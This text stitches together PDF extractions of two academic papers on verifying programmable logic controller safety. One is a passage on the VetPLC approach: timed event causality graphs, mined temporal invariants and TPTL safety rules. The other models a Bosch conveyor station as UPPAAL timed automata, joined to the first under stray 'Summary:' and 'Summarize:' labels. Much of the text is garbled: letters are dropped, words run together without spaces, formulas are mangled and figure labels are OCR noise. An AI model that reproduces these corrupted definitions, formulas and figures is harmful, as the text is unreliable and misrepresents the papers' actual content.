reality,due to the variation in program paths and indeterminism of mechanical, physical or chemical processes, the durations of real-world machine operations are never constant. On the other hand, due to physical and logical limits, machine actions are bounded by time constraints. Hence, our goal is to identify such soft invariants of event temporalities that fall into speci c ranges. We formally de ne temporal invariants using Timed Propositional Temporal Logic (TPTL) [26]: De nition 2. Let/epsilon1 aand/epsilon1bbe two event types. Then a temporal invariant is a property that relates /epsilon1aand/epsilon1bin both of the two following ways: /squaretx.(/epsilon1a ty.(/epsilon1b ty tx lower)): In an event trace, if an event instance of type /epsilon1aoccurs at time tx, then another of /epsilon1beventually will happen in the same trace at a later time ty, while the time difference between tyandtxis at least lower . /squaretx.(/epsilon1a ty.(/epsilon1b ty tx upper)): In an event trace, if an event instance of type /epsilon1aoccurs at time tx, then another of /epsilon1beventually will happen in the same trace at a later time ty, while the time difference between tyandtxis at most upper . As a result, a temporal invariant describes not only the order of two event types but also the lower and upper bounds of their time difference. To extract these invariants, we follow the approach in prior work (Synoptic [29] and Perfume [60]) to perform qualitative and quantitative data mining consecutively. However, unlike previous techniques that attempt to mine all possible correlations between any two events, our mining is selective and is guided by the generated TECG . Speci cally, we do not need to learn certain temporal relationships for a pair of event types if they contradict the dependencies in the graph. For example, in our motivating case, since we know the tem- poral logic /square(RFID IOComplete Update Complete ) holds, we do not further seek the possibility of whetherUpdate Complete is followed by RFID IOComplete . For all the pairwise relationships of two event types, /epsilon1aand /epsilon1b, that do not contradict those in TECG , we rst check if their qualitative temporality /square(/epsilon1a /epsilon1b) holds. This is equivalent to checking if: Follows[/epsilon1a][/epsilon1b]=Occurrence [/epsilon1a] (1) whereFollows[/epsilon1a][/epsilon1b]counts, in a trace, the number of type /epsilon1aevents followed by at least one of the type /epsilon1bevents and Occurrence [/epsilon1a]counts the number of event instances of /epsilon1a. Once we have determined the followed by relationship between two event types, we use the Perfume [60] algorithm to perform quantitative mining and extract the lower and upper bounds of time differences. In the end, we discovered 3 invariants for the motivational case as listed in Table I. Speed Recon guration of Real-world Machines. The mined bounds of soft invariants, lower and upper , re ectthe variation in program executions and production processes. However, such bounds are still associated with pre-con guredspeeds of physical machines, which often times do not reach the speci ed hard limits. To further understand the possible impact caused by speed recon guration, we need to consider absolute time bounds for these machine operations. Letjobbe the number of machine operations and v conf be the pre-con gured speed, then lower job/v conf upper . To derive the absolute lower bound for the time cost tjob,w e consider the rated motor speed vrated and thus have: ( lower vconf)/vrated job/v rated tjob. Meantime, since the minimum machine speed theoretically can be 0, the absolute maximum time to complete a task is in nity. However, in reality, for a high throughput, machinesare expected to nish jobs as quickly as possible. Thus, ideally, machines always operate at their highest speeds. Nevertheless, safety standards have been made to regulate the maximum machine speed. For instance, the American National Standards Institute (ANSI) has published ANSI RIA R15.06 [22] for Robot and Robot System Safety which recommends that robot speed should not exceed 10 in/sec (250 mm/sec) for safety- critical operations. Such recommendations can be considered as the lowest machine speeds that can guarantee ef cient and safe production. With this required safety speed, v safe,w ec a n further obtain the practical upper bound of tjob: ( lower vconf)/vrated tjob ( upper vconf)/vsafe (2) Admittedly, to incorporate hardware limits, we need to un- derstand the semantics of mined invariants in order to associatethis additional information to correct edges. We currentlyaddress this problem using human knowledge and leave theautomatic inference of event semantics as future work. With domain knowledge, we know the time for our robot to pass a part equals the time difference between Delivery Part and Part AtConveyor . Plus, our robot is running at 400mm/sec on average and its rated speed is 3300mm/sec. Thus, we can obtain an enhanced invariant for this event pair: [3s, 39.4s]. Enhancing TECG with Temporal Invariants. Extracted temporal invariants are then provided to the TECG . Note that they not only offer quantitative information to enhance the existing temporal relations in the graph but may also introduce new temporal dependencies. This is because the code we analyze represents only a partial view of the entire ICS environment and therefore does not contain all the eventrelations. As a complement, mining runtime data traces offers a holistic view of the plant and can further uncover implicit dependencies hidden from controller code. VI. S AFETY VETTING WITH TIMED EVENT SEQUENCES A. Timed Event Sequences Once we have constructed the TECG , we can generate event sequences based upon this graph. The major challenge is how to create event permutations that conform to the quantitative dependencies illustrated by TECG . Generally speaking, to encode the mined time range of an event (i.e., soft temporal invariant) into a sequence, we discretize the continuous range Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. Algorithm 2 Generation of Timed Event Sequences 1:procedure BUILD TSEQS(TECG in, ) 2: Set event GETEVENT SET(TECG in) 3: Set/prime event DISCRETIZE (Set event, ) 4:SEQ PERMUTE (Set/prime event ) 5: for SEQ SEQ do 6: for ev SEQ do 7: Path FINDALLSOLUTIONS (TECG in,ev) 8: if path Path :path SEQ.SUBSEQ(0,ev)then 9: SEQ SEQ SEQ 10: end if 11: end for 12: end for 13: returnSEQ 14: end procedure to multiple time slices and introduce a versioned event for each slice to represent its possible occurrences. To re ect the qualitative relations among events, we check every possible permutation against the graph, so as to guarantee the prereq- uisite for each event happens before its occurrence. Our algorithm B UILD TSEQS is presented in Algorithm 2. It takes two arguments. The rst one is TECG in, a reduced version ofTECG , which preserves solely the nodes that are PLC inputs. These input events are the necessary ones to exercise the PLCcode. The second argument is the discretization parameter that indicates the number of slices every time duration is divided into. On startup, our algorithm rst retrieves all theevents in the graph TECG into generate an event set Set event . Next, for any event in Set event , whose starting time is within a certain range (i.e., its incoming edge is labeled with an invariant), the range is discretized using to create multiple versioned events. We then replace the original event with a set of versioned ones. For instance, since Part AtConveyor is enabled 3 to 39.4 seconds after Deliver Part ,i ti s discretized to be a set {PACT+3,PACT+10,PACT+18, PACT+25,PACT+32,PACT+39}when is 5. Hence, we extend Set event to be a new set Set/prime event . Then, we permute all the events in Set/prime event to create sequences. Notice that in every permutation, only one versioned event from the same set can be chosen. The result of this P ERMUTE is a setSEQ containing all candidate sequences. We further check each candidate SEQto see if it contradicts the causalities indicated by TECG in, and if so, it will be discarded. To do so, we iterate over each event evin a sequence SEQ, and nd all the solutions for evon its hosting and-or graph TECG in.A solution for evis a path, from evto a top-level vertex, which includes all of its prerequisites that are required to cause evto happen. If any solution path is covered by the subsequence from the rst element of SEQ toev, we keep this candidate SEQ. Otherwise, it is removed from SEQ . Finally, we output the result SEQ as the generated timed event sequences. For our motivating example, we can create a timed sequence, 1:Pallet Sensor /squiggleright2: Part Sensor /squiggleright 3:CNC Part Ready /squiggleright4:Robot Ready /squiggleright5: Part - AtConveyor /squiggleright6:Part AtConveyor T+10/squiggleright7:RFID - IOComplete T+20, which can lead to the safety violation due to premature termination of 6:Part AtConveyor T+10. Detailed implementation can be found in Appendix D.Selection of .An a ve way for discretizing a time range is to merely consider its lower and upper bounds (i.e., = 1). Theoretically, it is suf cient to detect the possible presence oftiming-related safety violations. However, this is too coarse- grained and can only tell if an error will occur when a machine operates at its maximum or minimum speed. On the contrary, itis in fact crucial to understand the range of machine speeds that can lead to errors. Such contextual evidence can help securityinvestigators draw a better conclusion whether a logic error iscaused by attacks. For example, prior work [38] has correlated the narrowness of an error trigger with its malice. Thus, ideally, we expect to always select a larger . However, the increase in time slices also leads to the growth of total number of permutations. To understand how to strike a balance, we have an empirical study in the evaluation. Nevertheless, itis noteworthy that, while a better can provide informative evidence with lower cost, the selection of does not affect whether we can detect a safety defect. B. Safety Speci cation The event sequences that we generate can facilitate auto- mated path exploration for testing PLC code. However, the fact that we can reach an unsafe state does not necessarily mean we can automatically detect the problem. To enable automated detection, we need to further specify certain safety rules and programmatically verify them at runtime. Prior work [54] has adopted linear temporal logic (LTL) to formally de ne safety requirements for ICSs. However, at runtime, it is hard to enforce an LTL-based rule whichrequires an activity to be followed by another (e.g., over ow avoidance), because the absence of a required event during limited test time does not suggest its absence at a later time. Although, in practice, these required actions must be accomplished within a certain amount of time, LTL however is not capable of describing such temporal relations in a quantitative fashion. To address this limitation, we again use TPTL [26] to quantitatively express safety speci cations. De nition 3. LetPbe a set of atomic logical proposi- tion symbols about the system {p 1,p2,...p|A|}, e.g., sensor Pallet Sensor is on, and let =2Abe a nite alphabet composed of these propositions. Then, the set of TPTL-based Safety Requirements is inductively de ned by the grammar: :=x+c|c :=p| 1 2| 1 d 2|false| 1 2|/circlecopyrt | 1U 2|x. The grammar of TPTL is further explained in Appendix E. Table II demonstrates 5 typical classes of safety speci cations, which have been studied by previous academic work or required by OSHA (Occupational Safety and Health Admin- istration). We categorize the policies based on the root causes of industrial hazards. First, a majority of safety incidents are caused by dangerous machine-machine interactions, including machine collision, machines facing over ow or under ow due to upstream machines. Second, failure to separate humans from life-threatening machines may result in fatal accidents. Last but not least, individual machines, even without interac- Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. TABLE II: Categories of Safety Speci cations Typical Hazard Example Speci cation to Avoid Hazard Formal De nition
Summary:
Safety violations in programmable logic controllers (PLCs), caused either by faults or attacks, have recently garnered signi cant attention. However, prior efforts at PLC code vetting suffer from many drawbacks. Static analyses and veri cation cause signi cant false positives and cannot reveal speci c runtime contexts. Dynamic analyses and symbolic execution, on the otherhand, fail due to their inability to handle real-world PLC pro-grams that are event-driven and timing sensitive. In this paper, we propose V ETPLC, a temporal context-aware, program analysis- based approach to produce timed event sequences that can be used for automatic safety vetting . To this end, we (a)perform static program analysis to create timed event causality graphs in order to understand causal relations among events in PLC code and (b) mine temporal invariants from data traces collected in IndustrialControl System (ICS) testbeds to quantitatively gauge temporaldependencies that are constrained by machine operations. Our V ETPLC prototype has been implemented in 15K lines of code. We evaluate it on 10real-world scenarios from two different ICS settings. Our experiments show that V ETPLC outperforms state-of-the-art techniques and can generate event sequences that can be used to automatically detect hidden safety violations .
|
Summarize:
Keywords:Programmable LogicControllers,Timed Automata,ModelChecking. 1Introduction Verification ofsafetypropertiesforPLC(Pro- grammableLogicController)programsisimportantwhen theseprogramsaretocontrolcriticalapplicationsforre- activesystems.Thisexplainstheincreasinginterestin thepastfewyearsfortheapplicationofformalmethods totheanalysisofsuchprograms.Inthisarea,workwas mostlydevotedtotheuntimedframework[15],[4,8], evenwhenfunctionblocksfortimerswereincluded[16]. *ThisworkwassupportedbythePluriFormationProjectVSMTof ENSCachan.Introducingthestudyofquantitativepropertiesrelatedto timemakesthisverificationstepharder,becauseaddi- tionalcomponents mustbeaddedinthemodel,forin- stanceclocks,whichincreasethesizeofthemodel.How- ever,themodeloftimedautomata,introducedin1990by AlurandDill[2,3],hasprovedverysuccessful.Some decidabilityresultswereobtainedforthismodelaswell asforsomeextensionsandtheywereimplemented ineffi- cienttoolscalledtimedmodel-checkers, likeHYTECH[9], KRONOS[6]orUPPAAL[11],whichhavebeenapplied toindustrialcasestudies.Timedautomatahaverecently beenusedforthemodelingoftimedfeaturesinPLCpro- gramming[13,12,7]. Inthiswork,weareinterestedinthecombination of timeaspectswithmultitaskPLCprogramming. Ourcase studyconcernsapart(calledstation2)oftheMSS(Meca- tronicStandardSystem)platformfromBoschGroup,in whichmultitaskprogramming canbeusedtoreducethe reactiontimeofthecontrolprogramtoanexternalsig- nal.TheprogramiswritteninLadderDiagram,oneof thelanguagesmostcommonlyusedinthisarea,whichis partoftheIEC-61131-3 standard[10].Wegiveseman- ticsforasubclassofLadderDiagramprogramsincluding timerfunctionblocks,intermsoftimedautomata,andwe alsoprovideatimedautomatabasedmodelfortheoper- ativepartofthesystem.Thesetimedautomataarede- scribedinUPPAALsyntax.Whileasimilarapproachwas introducedin[12],weproposehereadditionalrestrictions whichallowustoreducesignificantlythesizeofthecom- pletemodel,obtainedfromitscomponentsbyasynchro- nizedproduct:theserestrictionsconsistinatomicityhy- potheses,compactingsequencesofactionsfromthecon- trolprogramintoasingleone,andleadtoreasonnable verificationtimesfortheresponsepropertytobechecked. 0-7803-9402-X/05/$20.00 2005IEEE 347 VOLUME2 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:40 UTC from IEEE Xplore. Restrictions apply. Wealsogiveasimplermodelfortimers,usingparticular featuresofUPPAAL. Section2ofthepaperexplainsthecontextofthis study:theproblemofreactiontimesinPLCprograms, andincludesadescriptionoftimedautomataandashort presentation ofUPPAAL.InSection3,wegivemorede- tailsonBoschMSSplatformandinSection4,wegive thesemanticsofthecontrolprogram.Section5presents thetimedautomatawhichformthecomponentsofthenet- work,whileSection6givestheresultsoftheverification step.values.Dependingontheconfiguration andtypeofthe PLC,thesevaluescanbeemittedeitherattheendofthe event-driven taskorattheendofthecurrentmaintask. Inthiswork,weinvestigatethesecondcasewhereoutput valuesoftheevent-driven taskareemittedbythemain program,whichyieldsareactiontimeofatmostP. inputi2 outputo2 InputiI outputol 2Programmable LogicControllers and TimedAutomata 2.1Programmable LogicControllerswithmulti-task programming Programmable LogicControllers(PLCs)executepro- gramsforthecontrolofanoperativepart,towhichthey areconnectedviaaninput/output system.Thecontrolpro- gramscanbewritteninseverallanguagesdescribedinthe IEC-61131-3 [10]standard.Theexecutionofsuchapro- gramconsistsiniteratingacyclewiththreemainsteps (figure1):first,inputvariablesarereadandtheirvalues arestoredinmemory.Thenacomputation stepisper- formedusingthesevalues,producingoutputvalueswhich arealsostored.Thelaststepisanactivationusingtheout- putvalues.ThecycledurationPiscalledthePLCscan. Inputscan Programexecution OutputactivationP:PLCscan Figure1.ThecyclicexecutionofaPLCpro- gram Theprogramming designmaybeeithermonotaskor multitask.Inthefirstcase,asingleprogramexecutesse- quentially,whileinthesecondcase,themaintaskcanbe interruptedbyadditionalpartsofcode,eitherwithafixed periodortriggeredbysomeevents.Thesetwoexecution modelsresultindifferentreactiontimestochangesofval- ues.Inthemonotaskcase,ifthechangeofvalueoccursat theinputscan,thecorresponding outputisemittedatthe endofthePLCcycle.Ifthechangeoccurslater,thisout- putmaybeemittedatasfarastheendofthenextcycle. Thisresultsinareactiontimeintheinterval[P,2P](fig- ure2).Thisreactiontimecanbereducedwithmulti-task programming: consideranevent-driven taskinterrupting themaintaskwhensomeeventoccurs.Inturn,theinter- ruptingtaskreadsitsinputandcomputesitsnewoutputCycle1 Cycle2 Figure2.Reactiontimewithmono-taskpro- gramming 2.2Timedautomata TimedautomatonwasintroducedbyAlurandDill[2], [3].Itconsistsoffiniteautomaton,whichhandlesafinite setofvariablescalledclocks.Theclocksareusedforthe specification ofquantitativetimeconstraintswhichmay beassociatedwithtransitions.Thesevariablesevolvesyn- chronouslywithtime(slope1). ForasetXofclocks,P(X)denotesthepowersetofX andwedefineC(X)asthesetofconjunctions ofatomic formulasoftheformx>xcforaclockx,aconstantcand x<in{<,<,=,>,>}- AtimedautomatonisatupleA=(E,X,Q,qo,I,E), whereEisafinitesetofactions,Xisthefinitesetof clocks,Qisafinitesetoflocations,withqocQtheinitial location,Iisamappingassociatingwitheachlocationq aclockconstraintI(q)cC(X),andECQxC(X)x ExP(X)xQisthesetoftransitions. TheclockconditionI(q)iscalledaninvariantfor locationq,andcontainsusuallyonlyatomicformulasof theformx<corx<cwhichmustholdaslongastime elapsesinthislocation. Atransitionoftheautomaton,writtenqg9a,qlCEis equippedwithalabelcontainingthreeparts(eachoneis optional):aguardgexpressingaconditioninC(X)on clockvalues,whichmustbesatisfiedforthetransitionto befired,anactionnameinZ,andaclockresetrCP(X). Thesemanticsofatimedautomatonisgiveninterms oftransitionsystems.Aconfiguration ofthesystemisa pair(q,v),whereqisalocationoftheautomatonandv isavaluationofthevariables,i.e.amappingassociating arealvaluewitheachclock.Theinitialconfiguration is (qo,vo)whereallclockvaluesareequalto0invo. Thesystemmaychangeitsconfiguration intwoways. *Eitherbyadelaymoveofdtimeunits,written (q,v)d(q,v+d),possibleifv+dsatisfiesthe invariantI(q)oflocationq. VOLUME2 348 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:40 UTC from IEEE Xplore. Restrictions apply. *Orbyanactionmove,written(q,v)A(q',v'),as- g,a,rsociatedwithadiscretetransitionq')q',ifvsat- isfiestheconstraintg.Inthiscase,theresetoperation yieldsv'(x)=0ifxbelongstorandv'(x)=v(x) otherwise,andv'mustsatisfytheinvariantofq'. 2.3ThetoolUppaal ThetoolUPPAAL(see[5]forthemorerecentdevel- opments)offersacompactdescriptionlanguage,asimu- lationmoduleandamodel-checker. Asystemisrepre- sentedbyacollectionfortimedautomata,whichcommu- nicatethroughbinarysynchronization: achannelccanbe definedfortwoautomata.Sendingamessageisdenoted bythediscreteactionc!whilereceivingthemessageisde- notedbyc?.AnUPPAALautomatonalsohandlesinteger variables.Aguardisaconjunctionofatomicclockcon- ditionsandsimilarconditionsonintegervariables.More- over,aclockresetmaybeaugmentedbyanupdateofthe integervariables. A(global)configuration isoftheform(f,v)where fisalocationvector(indicatingthecurrentstatein eachcomponentofthetimedautomatanetwork)andv isavaluationofbothclocksanddiscretevariables.An executioninthenetworkstartsininitiallocationsofthe differentcomponents withalltheclocksandvariables settozero.Thesemanticsofthismodelisexpressedby movesbetweentheconfigurations. Threetypesofmoves canoccurinthesystem:delaymoves,internalmovesand synchronized moves.Delaymovesandinternalmoves havealreadybeendescribedaboveforasingleautomaton, sowesimplydescribenowtheglobalevolution. Delaying.Givenacurrentlocationvector,timeelapses forallautomatasynchronously, aslongasnoinvariantis violated.Allclockvaluesincreasebytheamountoftime elapsed.Nochangeoccurforthelocationsortheinteger variables. Performing aninternalaction.Aninternalactionisan actionwhichcorresponds toneitherc!(sendingames- sage),norc?(receivingamessage).Ifsuchanactionis enabled(thevariablevaluessatisfytheguardcondition), thecomponentcanperformthisactionalone,whilethe othersdonothing.Onlythelocationofthiscomponentis changed,aswellasitsvariables,accordingtothetransi- tion. Synchronizing. If,inthenetwork,somecomplementary actionsc!andc?areenabledintwocomponents(inpar- ticular,guardsmustbesatisfiedbythecurrentvaluation), thenthesecomponents mustsynchronize. Thelocation vectorischangedforbothcomponentsandtheclockand variablevaluesarechangedaccordingtotheclockreset andupdatesofvariablesforthetwotransitions. Finally,weintroducetwoadditionalfeaturesofUp- PAALwhichwillbeveryusefulinourmodeling. *Acommittedlocation(decoratedbythespeciallabel C)corresponds toalocationinwhichnodelaymove ispossible.Onlyadiscretetransitioncanbeusedtoleavesuchalocation.Notethatthismechanism reducesthenon-determinism intheparallelcompo- sitionofthedifferentcomponents. *Abroadcastchannelisachannelwheremorethan twoautomatamaycommunicate: emissionofames- sagec!canbesynchronized withseveralreceptions c?inothercomponents. Notethatthisisanon- blockingsynchronization, sincethesenderisnever blocked,althoughthereceivermustsynchronize ifit can.Guardsonclocksarenotallowedonthereceiv- ingedge. 3DescriptionoftheMSS(Mecatronic Stan- dardSystem)platform JackmhoVemfent Optical sensor hinfdtiVe sensor forthebea rgtest Lmwitch cormovemen sensor.n1 Capciivsens Leftposition sern;orIBearingtcstposition Righposition sensor sen3sor Figure3.presentation ofstation2ofthe MSSplatform Presentation. PlatformMSS(fromBoschGroup)pro- videsafunctionforsortingastockofpinionsofdifferent materialsandforaddingorwithdrawing apress-fitbush- ingtoagivenpinion[14]. Ourstudyiscenteredonstation2(figure3)whichisin- tendedtoidentifythematerialofthepinion(steel,copper orblackPVC)andthepresenceorabsenceofapress- fitbushing.Theworkpieces aretransportedbyalinear conveyortoascanningposition,wherethepresenceor absenceofapress-fitbushingisdetected.Theyarethen testedbythreesensorstodeterminetheirmaterial.Thisis doneusinginductive,capacitiveandopticalsensors.The detectedinformationisforwardedtothenextstations.A rotary/liftgripperperformsthetransfertoafollow-onsta- tionifapplicable. Issuedetected.Aproblemariseswhentheconveyor arrivesatthebearingtestposition(POS_TESTsensor).At thistimetheconveyormovesathighspeed(200mm/s) VOLUME2 349 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:40 UTC from IEEE Xplore. Restrictions apply. andthevariationofthereactiontimeofthecontrolsys- tem,abovelOms,isnotnegligible.Indeedtheconveyor positionshouldhaveaprecisionof1mmforthetester(or jack)tobeabletopenetrateinsidethepinion,incasethe bearingisabsent.So,wecandeducethatthethevariation ofthereactiontimeofthecontrolsystemmustbeless than5ms.Intherestofthepaper,westudythecaseofa multitaskcontroller,withanevent-driven task,launched ontherisingedgeofthetestposition(POS_TEST)sensor, whichstopstheconveyorifitcomesfromtheloading station. Propertiestocheck.Themultitaskcontrolprogramof thisstationmustsatisfythefollowingproperties: P1Toensuresafety,theconveyormuststoponitsway outbutnotwhenitcomesbackfromunloading. P2Thetimeperformance isaccurate:theconveyorstops inlessthan5msatthepress-fitbushingtestpoint. Inthiswork,wefocusonthetimedpropertyP2,to showthatthemultitasksolutionreducesthereactiontime. 4Modelingprinciples Inthissection,webrieflyrecallthetimedautomaton basedsemanticsproposedbyMaderandWupper[12]for acontrolprogram.Thenweexplainthestructureofour modelfor(station2of)theMSSplatform,withaparticu- larattentiontothequestionoftimers. 4.1Mader-Wupper model Variousmodelshavealreadybeenproposedforthe analysisofPLCprograms.Ourapproachisbasedonthe modelintroducedbyMaderandWupper[12],whichdis- regardstheexecutiontimesofelementaryinstructions. X< 2X< 2 X<82 / N -_ -+ A- /N -1 \ _ X<82 X<82 Figure4.Mader-Wupper model Asdepictedinfigure4,themodelhasaclockxto measurethecyclescan,whichisthusresetaftereachcy- cleoftheprogram.Theinvariantx<_2isassociated witheachlocationandrepresentsanuppertimeboundfor eachwholescan.Theguardx>81appearsonthelast edgeofthecycleandrepresentsalowertimeboundfor theinput/output partofthecycle.Anedgeinthemodel describesastepofthecontrolprogram.Mader-Wupper alsomodelseachtimerblockasatimed automatonthatrunsinparallelwiththecontrolprogram. Synchronization isperformedthroughoperationsonthe timervariablesandonthetimercalls,whichrequiresone extraclockandthreesynchronization channelsforeach timer. 4.2Anoverviewofthemodel Ourmodelisbuiltinacompositional wayfromacol- lectionofnondeterministic processeswithfinitecontrol structureandreal-valuedclocks,communicating through channelsorsharedvariables.Thetwomainpartsarethe environment andthecontrolprogram,whichcommuni- catethroughsharedvariablesandsynchronization mes- sages.Themodelingoftheoperativepart(environment) isnecessaryfortheverificationofthesafetyandperfor- mancepropertiesstatedpreviously.Thedetailsareex- plainedinSection5. 4.3Modelingtimers Sixindependent timers(TONfunctionblockinIEC- 61131-3[10])areusedinstation2controlprogram.We nowexplainhowourmodelofaTONfunctionblockdif- fersfromthatofMader-Wupper [12]andhowweused broadcastchannelsinUPPAALtoavoiddeadlocks.Each TONblockismodeledbyanautomaton,describedinfig- ure5,withthreestates,oneclockx-Tonandtwodiscrete variablesTon-ine(input)andTon-Qe(output).Initially idle,thestatebecomesrunningwhenthetimerhasbeen switchedonandTimeout,whensomefixedpresetdelay (constantTonpte)hasbeenreached.Ateachcycleofthe maintask,asynchronization messageissent.Theau- tomatonisthenforcedtoevolvebytakingintoaccount thenewvaluesofthevariablescomputedbytheprevi- ouscycle.Adeadlockcouldoccuriftheautomatonisin astatewhereitcannotreceivethesynchronization mes- sageoftheprogram.Sowechoseasinglebroadcast channel(withemissionTON!andreceptionTON?)forall TONblocksinsteadofthreeordinarychannelsperTON inMader-Wupper's model. Ton_ine==1 TON? Ton_Qe:=0, x_Ton:=0idle runningDx_Ton<=Ton_pte Ton_ine==0 Ton_ine==0 (x_Ton==Ton_pte) TON? TON? &&Ton_ine==1 Ton_Qe:=0 Ton_Qe:=1 Timeout Figure5.UPPAALmodelofaTONblock VOLUME2 350 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:40 UTC from IEEE Xplore. Restrictions apply. 5ModelingwithUPPAAL 5.1Modelingtheenvironment Interest.InordertovalidatenotonlythePLCprogram butalsoitsintegrationinthesystemithastocontrol,we alsoneedtomodeltheoperativepart.Thisimpliesathor- oughknowledgeofthesystemtocontrol,particularlythe behaviorofeachelementanditsreactiontime.Modeling theenvironment makesitpossibletospeed-uptheveri- ficationtime,inparticularbyreducingthecombinatorial aspectsrelatedtonondeterministic definitionofallpossi- bleinputvalues,includingsometimesnonrelevantones. Indeed,whentheinputvaluesofthePLCprogramare emittedbyamodelinsteadofanondeterministic process, thespaceofreachablestatesisreduced.However,these partsofthemodelareusuallylimitedtotherepresentation ofnominaloperationmodes,whichisthecasehere. Modeling.Eachphysicaldeviceisrepresentedbyatimed automaton.Insuchanautomaton,agivenlocationrepre- sentsaparticularconfiguration ofthedevice.Inthemod- elsproposedhere,clocksaretheonlycontinuouscom- ponents,whilephysicalcontinuousmovesarediscretized (forinstancefortheconveyor). Theexternalenvironment. Instation2,theleftmostpo- sitioncorresponds totheloadingofpinions,whilethe rightmostpositionisusedforunloading.However,the controlofloadingandunloadingoperationsisnotpartof thisstation,whichjustwaitsforthemtobedone.Infor- mationaboutterminationofoneoftheseoperationsisob- tainedthroughchangesofinputvalues.Uponloading,the conveyorisprovidedanunspecifiedpinion.Thisismod- elledbyanautomaton,presentedinfigure6,whichselects inanondeterministic waythenatureofthepinion(vari- ableob)whentheconveyorisattherightmostposition. DCY:=1, ob:=6,left_pos==1evac_pinion:=O DCY:=l, ob:=5left_pos==1 evac_pinion:=O DCY1=iob=4, leftpos==1 evac_pinion ob:-0~~~~~~~~o:=3F/6.tMos==l evacpion ner0 t os==1stto2=Thejack.Thejackdetectstheevac_pinionce orawtadpress-fitbushing ina CY:workpiec. Tsttismaded leftpos==1 ob:=O Figure6.Modeloftheenvironment external tostation2 Thejack.Thejackdetectsthepresenceorabsenceof apress-fitbushinginaworkpiece. Thistestismade byaverticalmovementofthejackuntilalimitingposi-downjack? ob==Oob==211ob==411ob==611 ((ob==l11ob==311ob==5)&&pos_test==O)downijack? jackdown:=1 top go_down limiting_position upiack? jack_down:= 0upjack? downjack? upjack? downjack? ob==1IIob==511ob==3, pos_test==l Figure7.Timedautomatonforthejack. tion.Thejackmustgodownuntilthelimitingpositionis reached,inagiventime,toconcludetotheabsenceofthe press-fitbushing.Themodelofthissensor(figure7)de- pendsonthecharacteristics oftheworkpieceswhichare representedbythevaluesofthevariableob.Theautoma- tonstartsfromthestatetop.Hemovestostategodown whenhereceivesamessagedown-jack? fromthePLC program.Fromthispointon,therearetwocases:ifthere isapress-fitbushingintheworkpiece(represented inthe modelbytheguardob==lob==31ob==5)then theautomatonwaitsinthestategodown,elsetheautoma- tonmovestostatelimitingposition. Thesensors.Theoptical,capacitiveandinductivesen- sorsaremodeledbyautomatasynchronized withtheau- tomatonoftheconveyor.Theconveyorsendstheactiva- tionmessages(forexampleoptics?infigure8)whenitis underthecorresponding sensor.Accordingtothenature ofthematerial,thesensormodifiesthevalueofthecorre- spondingvariable(optical)whichisthenusedbythePLC program. ob==llob==211ob==311ob==4 optics? optical:=1, ob==O11ob==511ob==6 optics? idle0xco:=O x_co<=400 x_co==400 optical:=0 Figure8.Timedautomatonfortheoptical sensor. Thelinearconveyor.Theconveyoristhemainelement oftheoperativepart:severaltriggeringsofsensordepend onitsposition.Theconveyorisalsothemostdelicateto modelbecauseofitscontinuousbehavioralongthebelt, whileourmodelcanonlyprovideadiscreteabstraction ofthisbehavior,leavingoutthedetailswhichdonotin- fluencethepropertiestobechecked.Inordertoobtain reasonableperformances intermsofmemoryandauto- maticverificationtime,wemodelonlythealmoststa- blepositions,i.e.thepositionswheretheconveyorcan stop,ortriggerasensor.Thesepositionscorrespondtothe sixstates:inductivesensor, capacitivesensor, optical- VOLUME2 351 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:40 UTC from IEEE Xplore. Restrictions apply. Figure9.Timedautomatonfortheconveyor. sensor,test,left,right.Betweentwogivenpositions, wemodelthebehavioroftheconveyorbyonlyonestate withaninvariantwhichrepresentsthetimeneededbythe conveyortocrossthedistancebetweenthesetwoposi- tions.Forexample,theconveyorgoesfromtheleftpo- sitiontothecapacitive-sensor positionin490to500ms. Thereisanotherabstractionimposedbythefactthatno stopwatchexistsinUPPAAL:betweentwoalmoststable positions,theconveyorcannotchangedirection.Thecon- veyorsendsmessagesofsynchronization tothevarious sensors(likeoptics!)andtheevent-driventask(postest!) atthetimeofitsarrivaltothetestposition.Italsomodi- fiestheinputvariablesofthecontrolprogram.Thecorre- spondingautomatonisrepresentedinfigure9. 5.2Thecontrolprogram Themainprogram.Thefunctionalspecification ofthe globalsystemisdesignedinGRAFCET(orSFC)lan- guage,andfurtherimplemented inLadderlanguage.As explainedabove,theexecutionofaPLCprogramisacy- clewiththreephases:inputreading,computation ofnew valuesandoutputwriting.Thisperiodicoperationismod- eledinUPPAALbyanautomatonstructuredasaloop,and includingaclocktomeasurethecycletime(equalto10 u.t.here).Thecompletecycleoftheautomatonforthe ladderprogramthusconsistsofaloopwithfoursteps: 1.inputreadingandcomputation ofnewvaluesforthe evolutionconditionsoftheGRAFCET, 2.computation ofothernewvaluesforGRAFCETvari- ables:stepactivationandoutputcomputation, 3.outputwriting,performedbyasequenceofmessages forsynchronization withtheoperativepart, 4.resetoftheclockmodelingthecycletime.Theatomicityhypothesisisthefollowing:timecanelapse onlyinthethreestatesbetweenthesesteps,torepresent thedurationoftheirexecution. Theevent-driven program.Sinceitisrunuponacti- vationofthebushing-test position,theevent-driven task isstronglydependentontheenvironment. Thisaspectis modeledbytheemissionofamessagefromtheenviron- ment,receivedbytheautomatonoftheevent-driven task (figure11). i2==i1i3-1 motor:=O, motor==O idle i2==O&&3==0 motor--i X3 MOTOR X2 _EVT1ACTIV Figure11.UPPAALmodelandLadderDia- gramfortheevent-driven task Whenthemessagepostest!isemitted,theautomaton executesthealgebraicequationswhichrepresenttheLad- derprogramandsendstheoutputmessagestop!ifthe conditionholds.Notethattheexecutiontimeoftheeven- driventaskisnullduetothecommittedlocationusedto modelthepriorityoftheevent-driven task.Variouspro- grammingdesignsareconsideredinordertodetermine theconditionsunderwhichtherequirements aresatisfied: *theevent-driven taskemitshisownoutput, VOLUME2 352 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:40 UTC from IEEE Xplore. Restrictions apply. CFTO:=xO&&DCY, CFT1:=xl&&capacitive, 